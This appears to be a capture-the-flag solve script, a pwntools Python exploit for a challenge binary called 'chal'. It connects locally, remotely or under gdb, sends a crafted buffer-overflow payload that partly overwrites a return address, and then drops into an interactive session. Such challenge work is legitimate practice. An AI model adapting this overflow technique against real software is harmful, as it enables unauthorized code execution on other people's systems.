/..

#CONTENT

#TOP

solve.py
PYTHON
   1 
 

   2 
 

   3 
 

   4 
 

   5 
 

   6 
 

   7 
 

   8 
 

   9 
 

  10 
 

  11 
 

  12 
 

  13 
 

  14 
 

  15 
 

  16 
 

  17 
 

  18 
 

  19 
 

  20 
 

  21 
 

  22 
 

  23 
 

  24 
 

  25 
 


from pwn import *

name = "../chal/chal"
file = ELF(name)

context.terminal = ["kitty"]
script = """
b *main+245
c
"""

if args.HOST or args.PORT or args.REMOTE:
    p = remote(args.HOST or "localhost", args.PORT or "5000")
elif args.GDB:
    p = gdb.debug(name, gdbscript=script)
else:
    p = process(name)

payload =  "ΰ".encode() * (0x1020 // 6)
payload += b"A" * (0x1020 % 6 + 7)
payload += p16(0xa4c2)
payload += p64(0x4012)[:-1]
p.sendline(payload)

p.interactive()